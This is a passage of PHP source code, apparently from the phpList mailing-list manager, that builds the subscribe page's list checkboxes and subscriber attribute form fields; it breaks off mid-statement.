        $msg .= sprintf($format, $strEnterList);
    }
    foreach ($pluginErrors as $pluginError) {
        $msg .= sprintf($format, $pluginError);
    }
}

/**
 * @param int $userid
 * @param string $lists_to_show
 * @return string
 */
function ListAvailableLists($userid = 0, $lists_to_show = '')
{
    global $tables;
    if (isset($_POST['list'])) {
        $list = $_POST['list'];
    } elseif (!isset($_POST["subscribe"]) && isset($_GET['list']) && preg_match("/^(\d+,)*\d+$/", $_GET['list'])) {
        $list_value = "signup";
        $list_values = explode(",", $_GET["list"]);
        $list = array_fill_keys($list_values, $list_value);
    } else {
        $list = '';
    }
    $subselect = '';
    $listset = array();
    $subscribed = array();

    $showlists = explode(',', $lists_to_show);
    if (PREFERENCEPAGE_SHOW_PRIVATE_LISTS && !empty($userid)) {
        //# merge with the subscribed lists, regardless of public state
        $req = Sql_Query(sprintf('select listid from %s where userid = %d', $tables['listuser'], $userid));
        while ($row = Sql_Fetch_Row($req)) {
            $subscribed[] = $row[0];
        }
        $showlists = array_unique(array_merge($showlists, $subscribed));
    }


    foreach ($showlists as $listid) {
        if (preg_match("/^\d+$/", $listid) && !isPrivateList($listid)) {
            array_push($listset, $listid);
        }
    }
    if (count($listset) >= 1) {
        $subselect = 'where id in ('.implode(',', $listset).') ';
    }

    $some = 0;


    if (isset($GLOBALS['showCat'])&& $GLOBALS['showCat']===true){
        $listspercategory = array();
        $categories = array();
        $catresult = Sql_query(sprintf('select * from %s %s order by listorder, name',
            $GLOBALS['tables']['list'], $subselect));


        while ($row = Sql_fetch_array($catresult)) {

            $listspercategory[] = array('id' => $row ['id'], 'name' => $row ['name'], 'description' => $row ['description'], 'active' => $row ['active'], 'category' => $row ['category']);

        }

        foreach ($listspercategory as $key => $value) {

            if($value['active']) {
                $categories[] = $value['category'];
            }
        }
        $uniqueCat = array_unique($categories);

        $html = '<div class="accordion allexpanded" >';
        foreach ($uniqueCat as $key) {

            if ($key !== '') {
                $displayedCat = $key;
            } else  $displayedCat = s('General');

            $html .= '<h3 ><a name="general" >' . $displayedCat . '</a></h3>';
            $html .= '<div>';
            $html .= '<ul class="list" id="listcategory">';
            $count = 0;
            foreach ($listspercategory as $listelement)
                if ($listelement['category'] === $key) {
                    if ($listelement['active'] || in_array($listelement['id'], $subscribed) ) {

                        $html .= '<li ><input type="checkbox" name="list[' . $listelement['id'] . ']" value="signup" ';
                        if (isset($list[$listelement['id']]) && $list[$listelement['id']] === 'signup') {
                            $html .= 'checked="checked"';
                        }
                        if ($userid) {
                            $req = Sql_Fetch_Row_Query(sprintf('select userid from %s where userid = %d and listid = %d',
                                $GLOBALS['tables']['listuser'], $userid, $listelement['id']));
                            if (Sql_Affected_Rows()) {
                                $html .= 'checked="checked"';
                            }
                        }


                        $html .= ' /><b>' . stripslashes($listelement['name']) . '</b><div class="listdescription">';
                        $desc = nl2br(disableJavascript(stripslashes($listelement['description'])));
                        //     $html .= '<input type="hidden" name="listname['.$row["id"] . ']" value="'.htmlspecialchars(stripslashes($row["name"])).'"/>';
                        $html .= $desc . '</div></li>';
                        ++$some;
                        if ($some == 1) {
                            $singlelisthtml = sprintf('<input type="hidden" name="list[%d]" value="signup" />', $listelement['id']);
                            $singlelisthtml .= '<input type="hidden" name="listname[' . $listelement['id'] . ']" value="' . htmlspecialchars(stripslashes($listelement['name'])) . '"/>';
                        }

                    }

                } $html .= '</ul>';

            $html .= '</div>';
        }

        // end of row active

        $html .= '</div>';

    } else {

        $html = '<ul class="list">';
        $result = Sql_query("SELECT * FROM {$GLOBALS['tables']['list']} $subselect order by listorder, name");
        while ($row = Sql_fetch_array($result)) {
            if ($row['active'] || in_array($row['id'], $subscribed)) {
                //  id required for label
                $html .= '<li class="list"><input type="checkbox" name="list[' . $row['id'] . ']" id="list'.$row['id'].'" value="signup" ';
                if (isset($list[$row['id']]) && $list[$row['id']] == 'signup') {
                    $html .= 'checked="checked"';
                }
                if ($userid) {
                    $req = Sql_Fetch_Row_Query(sprintf('select userid from %s where userid = %d and listid = %d',
                        $GLOBALS['tables']['listuser'], $userid, $row['id']));
                    if (Sql_Affected_Rows()) {
                        $html .= 'checked="checked"';
                    }
                }
                $html .= " /> <label for=\"list$row[id]\"><b>".stripslashes($row['name']).'</b></label><div class="listdescription">';
                $desc = nl2br(disableJavascript(stripslashes($row['description'])));
                //     $html .= '<input type="hidden" name="listname['.$row["id"] . ']" value="'.htmlspecialchars(stripslashes($row["name"])).'"/>';
                $html .= $desc.'</div></li>';
                ++$some;
                if ($some == 1) {
                    $singlelisthtml = sprintf('<input type="hidden" name="list[%d]" value="signup" />', $row['id']);
                    $singlelisthtml .= '<input type="hidden" name="listname['.$row['id'].']" value="'.htmlspecialchars(stripslashes($row['name'])).'"/>';
                }

            }
        }
        $html .= '</ul>';

    }

    $hidesinglelist = getConfig('hide_single_list');
    if (!$some) {
        global $strNotAvailable;

        return '<p class="information">'.$strNotAvailable.'</p>';
    } elseif ($some == 1 && ($hidesinglelist == 'true' || $hidesinglelist === true || $hidesinglelist === '1')) {
        return $singlelisthtml;
    } else {
        global $strPleaseSelect;

        return '<p class="information">'.$strPleaseSelect.':</p>'.$html;
    }
}

function ListAttributes($attributes, $attributedata, $htmlchoice = 0, $userid = 0, $emaildoubleentry = 'no')
{
    global $strPreferHTMLEmail, $strPreferTextEmail,
           $strEmail, $tables, $table_prefix, $strPreferredFormat, $strText, $strHTML;
    /*  if (!sizeof($attributes)) {
        return "No attributes have been defined for this page";
       }
    */
    if ($userid) {
        $data = array();
        $current = Sql_Fetch_array_Query("select * from {$GLOBALS['tables']['user']} where id = $userid");
        $datareq = Sql_Query("select * from {$GLOBALS['tables']['user_attribute']} where userid = $userid");
        while ($row = Sql_Fetch_Array($datareq)) {
            $data[$row['attributeid']] = $row['value'];
        }

        $email = obfuscateEmailAddress($current['email']);
        $htmlemail = $current['htmlemail'];
        // override with posted info
        foreach ($current as $key => $val) {
            if (isset($_POST[$key]) && $key != 'password') {
                $current[$key] = $val;
            }
        }
    } else {
        if (isset($_REQUEST['email'])) {
            $email = stripslashes($_REQUEST['email']);
        } else {
            $email = '';
        }
        if (isset($_POST['htmlemail'])) {
            $htmlemail = $_POST['htmlemail'];
    	} elseif (!isset($_POST["subscribe"]) && isset($_GET['htmlemail']) && in_array($_GET['htmlemail'], [1,0])) {
      		$htmlemail = $_GET["htmlemail"];
        }
        $data = array();
        $current = array();
    }

    $textlinewidth = sprintf('%d', getConfig('textline_width'));
    if (!$textlinewidth) {
        $textlinewidth = 40;
    }
    list($textarearows, $textareacols) = explode(',', getConfig('textarea_dimensions'));
    if (!$textarearows) {
        $textarearows = 10;
    }
    if (!$textareacols) {
        $textareacols = 40;
    }

    $html = '';
    if (!isset($_GET['page']) || (isset($_GET['page']) && $_GET['page'] != 'import1')) {
        $html = sprintf('
  <tr><td><div class="required"><label for="email">%s *</label></div></td>
  <td class="attributeinput"><input type=text name=email required="required" placeholder="%s" size="%d" id="email" />
  <script language="Javascript" type="text/javascript">addFieldToCheck("email","%s");</script></td></tr>',
            $GLOBALS['strEmail'], htmlspecialchars($email), $textlinewidth, $GLOBALS['strEmail']);
    }

// BPM 12 May 2004 - Begin
    if ($emaildoubleentry == 'yes') {
        if (!isset($_REQUEST['emailconfirm'])) {
            $_REQUEST['emailconfirm'] = '';
        }
        $html .= sprintf('
  <tr><td><div class="required"><label for="confirm">%s *</label></div></td>
  <td class="attributeinput"><input type=text name=emailconfirm required="required" value="%s" size="%d" id="confirm" />
  <script language="Javascript" type="text/javascript">addFieldToCheck("emailconfirm","%s");</script></td></tr>',
            $GLOBALS['strConfirmEmail'], htmlspecialchars(stripslashes($_REQUEST['emailconfirm'])), $textlinewidth,
            $GLOBALS['strConfirmEmail']);
    }
// BPM 12 May 2004 - Finish

    if ((isset($_GET['page']) && $_GET['page'] != 'import1') || !isset($_GET['page'])) {
        if (ASKFORPASSWORD) {
            // we only require a password if there isnt one, so they can set it
            // otherwise they can keep the existing, if they do not enter anything
            if (!isset($current['password']) || !$current['password']) {
                $pwdclass = 'required';
                $js = sprintf('<script language="Javascript" type="text/javascript">addFieldToCheck("password","%s");</script>',
                    $GLOBALS['strPassword']);
                $js2 = sprintf('<script language="Javascript" type="text/javascript">addFieldToCheck("password_check","%s");</script>',
                    $GLOBALS['strPassword2']);
                $html .= '<input type="hidden" name="passwordreq" value="1" />';
            } else {
                $pwdclass = 'attributename';
                $html .= '<input type="hidden" name="passwordreq" value="0" />';
            }

            $html .= sprintf('
  <tr><td><div class="%s"><label for="pwd">%s</label></div></td>
  <td class="attributeinput"><input type=password name=password value="" size="%d" id="pwd" />%s</td></tr>',
                $pwdclass, $GLOBALS['strPassword'], $textlinewidth, $js);
            $html .= sprintf('
  <tr><td><div class="%s"><label for="pwd2">%s</label></div></td>
  <td class="attributeinput"><input type="password" name="password_check" value="" size="%d" id="pwd2" />%s</td></tr>',
                $pwdclass, $GLOBALS['strPassword2'], $textlinewidth, $js2);
        }
    }

//# Write attribute fields
    switch ($htmlchoice) {
        case 'textonly':
            if (!isset($htmlemail)) {
                $htmlemail = 0;
            }
            $html .= sprintf('<input type="hidden" name="htmlemail" value="0" />');
            break;
        case 'htmlonly':
            if (!isset($htmlemail)) {
                $htmlemail = 1;
            }
            $html .= sprintf('<input type="hidden" name="htmlemail" value="1" />');
            break;
        case 'checkfortext':
            if (!isset($htmlemail)) {
                $htmlemail = 1;
            }
            $html .= sprintf('<tr><td colspan="2">
      <span class="attributeinput">
      <input type="checkbox" name="textemail" value="1" %s id="textemail" /></span>
      <span class="attributename"><label for="textemail">%s</label></span>
      </td></tr>', !$htmlemail ? 'checked="checked"' : '', $strPreferTextEmail);
            break;
        case 'radiotext':
            if (!isset($htmlemail)) {
                $htmlemail = 0;
            }
            $html .= sprintf('<tr><td colspan="2">
        <span class="attributename">%s<br/>
        <span class="attributeinput"><input type=radio name="htmlemail" value="0" %s id="htmlemail0" /></span>
        <span class="attributename"><label for="htmlemail0">%s</label></span>
        <span class="attributeinput"><input type=radio name="htmlemail" value="1" %s id="htmlemail1" /></span>
        <span class="attributename"><label for="htmlemail1">%s</label></span></td></tr>',
                $strPreferredFormat,
                !$htmlemail ? 'checked="checked"' : '', $strText,
                $htmlemail ? 'checked="checked"' : '', $strHTML);
            break;
        case 'radiohtml':
            if (!isset($htmlemail)) {
                $htmlemail = 1;
            }
            $html .= sprintf('<tr><td colspan="2">
        <span class="attributename">%s</span><br/>
        <span class="attributeinput"><input type="radio" name="htmlemail" value="0" %s id="htmlemail0" /></span>
        <span class="attributename"><label for="htmlemail0">%s</label></span>
        <span class="attributeinput"><input type="radio" name="htmlemail" value="1" %s id="htmlemail1" /></span>
        <span class="attributename"><label for="htmlemail1">%s</label></span></td></tr>',
                $strPreferredFormat,
                !$htmlemail ? 'checked="checked"' : '', $strText,
                $htmlemail ? 'checked="checked"' : '', $strHTML);
            break;
        case 'checkforhtml':
        default:
            if (!isset($htmlemail)) {
                $htmlemail = 1;
            }
            $html .= sprintf('<tr><td colspan="2">
        <span class="attributeinput"><input type="checkbox" name="htmlemail" value="1" %s id="htmlemail" /></span>
        <span class="attributename"><label for="htmlemail">%s</label></span></td></tr>', $htmlemail ? 'checked="checked"' : '', $strPreferHTMLEmail);
            break;
    }
    $html .= "\n";

    $attids = implode(',', array_keys($attributes));
    $output = array();
    if ($attids) {
        $res = Sql_Query("select * from {$GLOBALS['tables']['attribute']} where id in ($attids)");
        while ($attr = Sql_Fetch_Array($res)) {
            $output[$attr['id']] = '';
            if (!isset($data[$attr['id']])) {
                $data[$attr['id']] = '';
            }
            $attr['required'] = $attributedata[$attr['id']]['required'];
            $attr['default_value'] = $attributedata[$attr['id']]['default_value'];
            $fieldname = 'attribute'.$attr['id'];
            //  print "<tr><td>".$attr["id"]."</td></tr>";
            if ($userid && !isset($_POST[$fieldname])) {
                // post values take precedence
                $val = Sql_Fetch_Row_Query(sprintf('select value from %s where
          attributeid = %d and userid = %d', $GLOBALS['tables']['user_attribute'], $attr['id'], $userid));
                $_POST[$fieldname] = $val[0];
            } elseif (!isset($_POST[$fieldname])) {
                $_POST[$fieldname] = 0;
            }
            switch ($attr['type']) {
                case 'checkbox':
                    $output[$attr['id']] = '<tr><td colspan="2">';
                    // what they post takes precedence over the database information
                    if ($_POST[$fieldname]) {
                        $checked = $_POST[$fieldname] ? 'checked="checked"' : '';
                    } else {
                        $checked = $data[$attr['id']] ? 'checked="checked"' : '';
                    }
                    $output[$attr['id']] .= sprintf("\n".'<input type="checkbox" name="%s" value="on" %s class="attributeinput" id="'.$fieldname.'" />',
                        $fieldname, $checked);
                    $output[$attr['id']] .= sprintf("\n".'<span class="%s"><label for="'.$fieldname.'">%s</label></span>',
                        $attr['required'] ? 'required' : 'attributename', $attr['required'] ? stripslashes($attr['name']).' *' : stripslashes($attr['name']));
                    if ($attr['required']) {
                        $output[$attr['id']] .= sprintf('<script language="Javascript" type="text/javascript">addFieldToCheck("%s","%s");</script>',
                            $fieldname, $attr['name']);
                    }
                    break;
                case 'radio':
                    $output[$attr['id']] .= sprintf("\n".'<tr><td colspan="2"><div class="%s">%s</div>',
                        $attr['required'] ? 'required' : 'attributename', $attr['required'] ? stripslashes($attr['name']).' *' : stripslashes($attr['name']));
                    $values_request = Sql_Query("select * from $table_prefix".'listattr_'.$attr['tablename'].' order by listorder,name');
                    while ($value = Sql_Fetch_array($values_request)) {
                        if (!empty($_POST[$fieldname])) {
                            $checked = $_POST[$fieldname] == $value['id'] ? 'checked="checked"' : '';
                        } elseif ($data[$attr['id']]) {
                            $checked = $data[$attr['id']] == $value['id'] ? 'checked="checked"' : '';
                        } else {
                            $checked = $attr['default_value'] == $value['name'] ? 'checked="checked"' : '';
                        }
                        $output[$attr['id']] .= sprintf('<input type="radio"  class="attributeinput" name="%s" id="'.$fieldname.$value['id'].'" value="%s" %s />&nbsp;%s&nbsp;',
                            $fieldname, $value['id'], $checked, '<label for="'.$fieldname.$value['id'].'">'.$value['name'].'</label>');
                    }
                    if ($attr['required']) {
                        $output[$attr['id']] .= sprintf('<script language="Javascript" type="text/javascript">addGroupToCheck("%s","%s");</script>',
                            $fieldname, $attr['name']);
                    }
                    break;
                case 'select':
                    $output[$attr['id']] .= sprintf("\n".'<tr><td><div class="%s"><label for="'.$fieldname.'">%s</label></div>',
                        $attr['required'] ? 'required' : 'attributename', $attr['required'] ? stripslashes($attr['name']).' *' : stripslashes($attr['name']));
                    $values_request = Sql_Query("select * from $table_prefix".'listattr_'.$attr['tablename'].' order by listorder,name');
                    $output[$attr['id']] .= sprintf('</td><td class="attributeinput"><!--%d--><select name="%s" class="attributeinput" id="'.$fieldname.'">',
                        $data[$attr['id']], $fieldname);
                    while ($value = Sql_Fetch_array($values_request)) {
                        if (!empty($_POST[$fieldname])) {
                            $selected = $_POST[$fieldname] == $value['id'] ? 'selected="selected"' : '';
                        } elseif ($data[$attr['id']]) {
                            $selected = $data[$attr['id']] == $value['id'] ? 'selected="selected"' : '';
                        } elseif (!empty($attr['default_value'])) {
                            $selected = strtolower($attr['default_value']) == strtolower($value['name']) ? 'selected="selected"' : '';
                        } elseif (strtolower($attr['name']) == 'country' && !empty($_SERVER['GEOIP_COUNTRY_NAME'])) {
                            $selected = strtolower($_SERVER['GEOIP_COUNTRY_NAME']) == strtolower($value['name']) ? 'selected="selected"' : '';
                        } else {
                            $selected = '';
                        }
                        if (preg_match('/^'.preg_quote(EMPTY_VALUE_PREFIX).'/i', $value['name'])) {
                            $value['id'] = '';
                        }
                        $output[$attr['id']] .= sprintf('<option value="%s" %s>%s', $value['id'], $selected,
                            stripslashes($value['name']));
                    }
                    $output[$attr['id']] .= '</select>';
                    break;
                case 'checkboxgroup':
                    $output[$attr['id']] .= sprintf("\n".'<tr><td><div class="%s">%s</div>',
                        $attr['required'] ? 'required' : 'attributename', $attr['required'] ? stripslashes($attr['name']).' *' : stripslashes($attr['name']));
                    $values_request = Sql_Query("select * from $table_prefix".'listattr_'.$attr['tablename'].' order by listorder,name');
                    $output[$attr['id']] .= sprintf('</td>');
                    $first_td = 0;
                    while ($value = Sql_Fetch_array($values_request)) {
                        $selected = '';
                        if (is_array($_POST[$fieldname])) {
                            $selected = in_array($value['id'], $_POST[$fieldname]) ? 'checked' : '';
                        } elseif ($data[$attr['id']]) {
                            $selection = explode(',', $data[$attr['id']]);
                            $selected = in_array($value['id'], $selection) ? 'checked="checked"' : '';
                        }
                        if ($first_td == 0) {
                            $output[$attr['id']] .= sprintf('<td class="attributeinput"><input type="checkbox" name="%s[]"  class="attributeinput" value="%s" %s id="'.$fieldname.$value['id'].'" /> <label for="'.$fieldname.$value['id'].'">%s</label></td>',
                                $fieldname, $value['id'], $selected, stripslashes($value['name']));
                            $output[$attr['id']] .= sprintf('</tr>');
                        } else {
                            $output[$attr['id']] .= sprintf('<tr><td><div></div></td><td class="attributeinput"><input type="checkbox" name="%s[]"  class="attributeinput" value="%s" %s id="'.$fieldname.$value['id'].'" />  <label for="'.$fieldname.$value['id'].'">%s</label></td></tr>',
                                $fieldname, $value['id'], $selected, stripslashes($value['name']));
                        }
                        ++$first_td;
                    }
                    $first_td = 0;
                    break;
                case 'textline':
                    $output[$attr['id']] .= sprintf("\n".'<tr><td><div class="%s"><label for="'.$fieldname.'">%s</label></div>',
                        $attr['required'] ? 'required' : 'attributename', $attr['required'] ? $attr['name'].' *' : $attr['name']);
                    $output[$attr['id']] .= sprintf('</td><td class="attributeinput">
            <input type="text" name="%s"  class="attributeinput" size="%d" value="%s" id="'.$fieldname.'" />', $fieldname,
                        $textlinewidth,
                        $_POST[$fieldname] ? str_replace('"', '&#x22;', stripslashes($_POST[$fieldname])) : ($data[$attr['id']] ? $data[$attr['id']] : $attr['default_value']));
                    if ($attr['required']) {
                        $output[$attr['id']] .= sprintf('<script language="Javascript" type="text/javascript">addFieldToCheck("%s","%s");</script>',
                            $fieldname, $attr['name']);
                    }
                    break;
                case 'textarea':
                    $output[$attr['id']] .= sprintf("\n".'<tr><td colspan="2">
            <div class="%s"><label for="'.$fieldname.'">%s</label></div></td></tr>', $attr['required'] ? 'required' : 'attributename',
                        $attr['required'] ? $attr['name'].' *' : $attr['name']);
                    $output[$attr['id']] .= sprintf('<tr><td class="attributeinput" colspan="2">
            <textarea name="%s" rows="%d"  class="attributeinput" cols="%d" wrap="virtual" id="'.$fieldname.'">%s</textarea>',
                        $fieldname, $textarearows, $textareacols,
                        $_POST[$fieldname] ? str_replace(array('>', '<'), array('&gt;', '&lt;'),stripslashes($_POST[$fieldname])) : ($data[$attr['id']] ? str_replace(array('>', '<'), array('&gt;', '&lt;'),stripslashes($data[$attr['id']])) : $attr['default_value']));
                    if ($attr['required']) {
                        $output[$attr['id']] .= sprintf('<script language="Javascript" type="text/javascript">addFieldToCheck("%s","%s");</script>',
                            $fieldname, $attr['name']);
                    }
                    break;
                case 'hidden':
                    $output[$attr['id']] .= sprintf('<input type="hidden" name="%s" size="40" value="%s" />',
                        $fieldname, $data[$attr['id']] ? $data[$attr['id']] : $attr['default_value']);
                    break;
                case 'date':
                    require_once dirname(__FILE__).'/date.php';
                    $date = new Date();
                    $postval = $date->getDate($fieldname);
                    if ($data[$attr['id']]) {
                        $val = $data[$attr['id']];
                    } else {
                        $val = $postval;
                    }

                    $output[$attr['id']] = sprintf("\n".'<tr><td><div class="%s">%s</div>',
                        $attr['required'] ? 'required' : 'attributename', $attr['required'] ? $attr['name'].' *' : $attr['name']);
                    $output[$attr['id']] .= sprintf('</td><td class="attributeinput">
            %s</td></tr>', $date->showInput($fieldname, '', $val));
                    break;
                default:
                    print '<!-- error: huh, invalid attribute type -->';
            }
            $output[$attr['id']] .= "</td></tr>\n";
        }
    }

    // make sure the order is correct
    foreach ($attributes as $attribute => $listorder) {
        if (isset($output[$attribute])) {
            $html .= $output[$attribute];
        }
    }

    return $html;
}

/* same as the above, with minimal markup and no JS */
function ListAttributes2011($attributes, $attributedata, $htmlchoice = 0, $userid = 0, $emaildoubleentry = 'no')
{
    global $strPreferHTMLEmail, $strPreferTextEmail,
           $strEmail, $tables, $table_prefix, $strPreferredFormat, $strText, $strHTML;

    if ($userid) {
        $data = array();
        $current = Sql_Fetch_array_Query("select * from {$GLOBALS['tables']['user']} where id = $userid");
        $datareq = Sql_Query("select * from {$GLOBALS['tables']['user_attribute']} where userid = $userid");
        while ($row = Sql_Fetch_Array($datareq)) {
            $data[$row['attributeid']] = $row['value'];
        }

        $email = $current['email'];
        $htmlemail = $current['htmlemail'];
        // override with posted info
        foreach ($current as $key => $val) {
            if (isset($_POST[$key]) && $key != 'password') {
                $current[$key] = $val;
            }
        }
    } else {
        if (isset($_REQUEST['email'])) {
            $email = stripslashes($_REQUEST['email']);
        } else {
            $email = '';
        }
        if (isset($_POST['htmlemail'])) {
            $htmlemail = $_POST['htmlemail'];
        }
        $data = array();
        $current = array();
    }

    $textlinewidth = sprintf('%d', getConfig('textline_width'));
    if (!$textlinewidth) {
        $textlinewidth = 40;
    }
    list($textarearows, $textareacols) = explode(',', getConfig('textarea_dimensions'));
    if (!$textarearows) {
        $textarearows = 10;
    }
    if (!$textareacols) {
        $textareacols = 40;
    }

    $html = '';
    $html .= '<fieldset class="subscriberdetails">';
    $html .= sprintf('<div class="required"><label for="email">%s *</label>
    <input type="text" name="email" value="%s" class="input email required" />', $GLOBALS['strEmail'],
        htmlspecialchars($email));

    if ($emaildoubleentry == 'yes') {
        if (!isset($_REQUEST['emailconfirm'])) {
            $_REQUEST['emailconfirm'] = '';
        }
        $html .= sprintf('<label for="emailconfirm">%s</label>
      <input type="text" name="emailconfirm" value="%s" class="input emailconfirm required" />',
            $GLOBALS['strConfirmEmail'], htmlspecialchars(stripslashes($_REQUEST['emailconfirm'])),
            $GLOBALS['strConfirmEmail']);
    }

    if (ASKFORPASSWORD) {
        // we only require a password if there isnt one, so they can set it
        // otherwise they can keep the existing, if they do not enter anything
        if (!isset($current['password']) || !$current['password']) {
            $pwdclass = 'required';
            //  $html .= '<input type="hidden" name="passwordreq" value="1" />';
        } else {
            $pwdclass = 'attributename';
            //  $html .= '<input type="hidden" name="passwordreq" value="0" />';
        }

        $html .= sprintf('
      <label for="password">%s</label><input type="password" id="password" name="password" value="" class="input password required" />',
            $GLOBALS['strPassword']);
        $html .= sprintf('
      <label for="password_check">%s</label><input type="password" name="password_check" id="password_check" value="" class="input password required" />',
            $GLOBALS['strPassword2']);
    }
    $html .= '</div>'; //# class=required

    $htmlchoice = 'checkforhtml';
//# Write attribute fields
    switch ($htmlchoice) {
        case 'textonly':
            if (!isset($htmlemail)) {
                $htmlemail = 0;
            }
            $html .= sprintf('<input type="hidden" name="htmlemail" value="0" />');
            break;
        case 'htmlonly':
            if (!isset($htmlemail)) {
                $htmlemail = 1;
            }
            $html .= sprintf('<input type="hidden" name="htmlemail" value="1" />');
            break;
        case 'checkfortext':
            if (!isset($htmlemail)) {
                $htmlemail = 0;
            }
            $html .= sprintf('<fieldset class="htmlchoice"><div><input type="checkbox" name="textemail" id="textemail" value="1" %s /><label for="textemail">%s</label></div></fieldset>',
                empty($htmlemail) ? 'checked="checked"' : '', $GLOBALS['strPreferTextEmail']);
            break;
        case 'radiotext':
            if (!isset($htmlemail)) {
                $htmlemail = 0;
            }
        case 'radiohtml':
            if (!isset($htmlemail)) {
                $htmlemail = 1;
            }
            $html .= sprintf('<fieldset class="htmlchoice">
        <legend>%s</legend>
        <div><input type="radio" id="choicetext" name="htmlemail" value="0" %s /><label for="choicetext" class="htmlchoice">%s</label></div>
        <div><input type="radio" id="choicehtml" name="htmlemail" value="1" %s /><label for="choicehtml" class="htmlchoice">%s</label></div>
        </fieldset>',
                $GLOBALS['strPreferredFormat'],
                empty($htmlemail) ? 'checked="checked"' : '', $GLOBALS['strText'],
                !empty($htmlemail) ? 'checked="checked"' : '', $GLOBALS['strHTML']);
            break;
        case 'checkforhtml':
        default:
            if (!isset($htmlemail)) {
                $htmlemail = 0;
            }
            $html .= sprintf('<fieldset class="htmlchoice"><div><input type="checkbox" name="htmlemail" id="htmlemail" value="1" %s />
        <label for="htmlemail">%s</label></div></fieldset>', !empty($htmlemail) ? 'checked="checked"' : '',
                $GLOBALS['strPreferHTMLEmail']);
            break;
    }
    $html .= "</fieldset>\n";

    $html .= '<fieldset class="attributes">'."\n";

    $attids = implode(',', array_keys($attributes));
    $output = array();
    if ($attids) {
        $res = Sql_Query("select * from {$GLOBALS['tables']['attribute']} where id in ($attids)");
        while ($attr = Sql_Fetch_Array($res)) {
            $output[$attr['id']] = '';
            if (!isset($data[$attr['id']])) {
                $data[$attr['id']] = '';
            }
            $attr['required'] = $attributedata[$attr['id']]['required'];
            $attr['default_value'] = $attributedata[$attr['id']]['default_value'];
            $fieldname = 'attribute'.$attr['id'];
            //  print "<tr><td>".$attr["id"]."</td></tr>";
            if ($userid && !isset($_POST[$fieldname])) {
                // post values take precedence
                $val = Sql_Fetch_Row_Query(sprintf('select value from %s where
          attributeid = %d and userid = %d', $GLOBALS['tables']['user_attribute'], $attr['id'], $userid));
                $_POST[$fieldname] = $val[0];
            } elseif (!isset($_POST[$fieldname])) {
                $_POST[$fieldname] = 0;
            }
            switch ($attr['type']) {
                case 'checkbox':
                    $output[$attr['id']] = '';
                    // what they post takes precedence over the database information
                    if (isset($_POST[$fieldname])) {
                        $checked = !empty($_POST[$fieldname]) ? 'checked="checked"' : '';
                    } else {
                        $checked = !empty($data[$attr['id']]) ? 'checked="checked"' : '';
                    }
                    $output[$attr['id']] .= sprintf("\n".'<input type="checkbox" name="%s" value="on" %s class="input%s" />',
                        $fieldname, $checked, $attr['required'] ? ' required' : '');
                    $output[$attr['id']] .= sprintf("\n".'<label for="%s" class="%s">%s</label>', $fieldname,
                        $attr['required'] ? 'required' : '', stripslashes($attr['name']));
                    break;
                case 'radio':
                    $output[$attr['id']] .= sprintf("\n".'<fieldset class="radiogroup %s"><legend>%s</legend>',
                        $attr['required'] ? 'required' : '', stripslashes($attr['name']));
                    $values_request = Sql_Query("select * from $table_prefix".'listattr_'.$attr['tablename'].' order by listorder,name');
                    while ($value = Sql_Fetch_array($values_request)) {
                        if (!empty($_POST[$fieldname])) {
                            $checked = $_POST[$fieldname] == $value['id'] ? 'checked="checked"' : '';
                        } elseif ($data[$attr['id']]) {
                            $checked = $data[$attr['id']] == $value['id'] ? 'checked="checked"' : '';
                        } else {
                            $checked = $attr['default_value'] == $value['name'] ? 'checked="checked"' : '';
                        }
                        $output[$attr['id']] .= sprintf('<input type="radio" class="input%s" name="%s" value="%s" %s /><label for="%s">%s</label>',
                            $attr['required'] ? ' required' : '', $fieldname, $value['id'], $checked, $fieldname,
                            $value['name']);
                    }
                    $output[$attr['id']].'</fieldset>';
                    break;
                case 'select':
                    $output[$attr['id']] .= sprintf("\n".'<fieldset class="selectgroup %s"><label for="%s">%s</label>',
                        $attr['required'] ? 'required' : '', $fieldname, stripslashes($attr['name']));
                    $values_request = Sql_Query("select * from $table_prefix".'listattr_'.$attr['tablename'].' order by listorder,name');
                    $output[$attr['id']] .= sprintf('<select name="%s" class="input%s">', $fieldname,
                        $attr['required'] ? 'required' : '');
                    while ($value = Sql_Fetch_array($values_request)) {
                        if (!empty($_POST[$fieldname])) {
                            $selected = $_POST[$fieldname] == $value['id'] ? 'selected="selected"' : '';
                        } elseif ($data[$attr['id']]) {
                            $selected = $data[$attr['id']] == $value['id'] ? 'selected="selected"' : '';
                        } else {
                            $selected = $attr['default_value'] == $value['name'] ? 'selected="selected"' : '';
                        }
                        if (preg_match('/^'.preg_quote(EMPTY_VALUE_PREFIX).'/i', $value['name'])) {
                            $value['id'] = '';
                        }
                        $output[$attr['id']] .= sprintf('<option value="%s" %s>%s</option>', $value['id'], $selected,
                            stripslashes($value['name']));
                    }
                    $output[$attr['id']] .= '</select>';
                    $output[$attr['id']] .= '</fieldset>';
                    break;
                case 'checkboxgroup':
                    $output[$attr['id']] .= sprintf("\n".'<fieldset class="checkboxgroup %s"><label for="%s">%s</label>',
                        $attr['required'] ? 'required' : '', $fieldname, stripslashes($attr['name']));
                    $values_request = Sql_Query("select * from $table_prefix".'listattr_'.$attr['tablename'].' order by listorder,name');
                    $cbCounter = 0;
                    while ($value = Sql_Fetch_array($values_request)) {
                        ++$cbCounter;
                        $selected = '';
                        if (is_array($_POST[$fieldname])) {
                            $selected = in_array($value['id'], $_POST[$fieldname]) ? 'checked="checked"' : '';
                        } elseif ($data[$attr['id']]) {
                            $selection = explode(',', $data[$attr['id']]);
                            $selected = in_array($value['id'], $selection) ? 'checked="checked"' : '';
                        }
                        $output[$attr['id']] .= sprintf('<input type="checkbox" name="%s[]" id="%s%d" class="input%s" value="%s" %s /><label for="%s%d">%s</label>',
                            $fieldname, $fieldname, $cbCounter, $attr['required'] ? ' required' : '', $value['id'],
                            $selected, $fieldname, $cbCounter, stripslashes($value['name']));
                    }
                    $output[$attr['id']] .= '</fieldset>';
                    break;
                case 'textline':
                    $output[$attr['id']] .= sprintf("\n".'<label for="%s" class="input %s">%s</label>', $fieldname,
                        $attr['required'] ? ' required' : '', $attr['name']);
                    $output[$attr['id']] .= sprintf('<input type="text" name="%s" class="input%s" value="%s" />',
                        $fieldname, $attr['required'] ? ' required' : '',
                        isset($_POST[$fieldname]) ? htmlspecialchars(stripslashes($_POST[$fieldname])) : (isset($data[$attr['id']]) ? $data[$attr['id']] : $attr['default_value']));
                    break;
                case 'textarea':
                    $output[$attr['id']] .= sprintf("\n".'<label for="%s" class="input %s">%s</label>', $fieldname,
                        $attr['required'] ? ' required' : '', $attr['name']);
                    $output[$attr['id']] .= sprintf('<textarea name="%s" rows="%d" cols="%d" class="input%s" wrap="virtual">%s</textarea>',
